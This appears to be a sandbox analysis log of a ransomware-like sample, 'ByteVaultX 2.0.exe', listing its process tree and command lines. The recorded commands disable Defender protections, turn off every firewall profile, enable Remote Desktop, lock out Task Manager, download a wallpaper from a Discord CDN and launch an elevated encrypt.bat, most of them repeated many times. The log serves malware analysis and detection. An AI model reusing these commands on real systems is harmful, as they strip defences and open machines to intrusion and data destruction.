PID 2068 wrote to memory of 3560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2068 wrote to memory of 4312 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 4312 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2076 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2076 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2208 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2208 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 3996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 3996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 4552 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 4552 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 4332 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 4332 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4332 wrote to memory of 4504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 4332 wrote to memory of 4504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 2068 wrote to memory of 748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2068 wrote to memory of 748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3764,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\SYSTEM32\runas.exe

runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4632,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=4652 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4620,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=5440,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5468,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5640 /prefetch:8

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=5888,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5968 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=6272,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5112 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

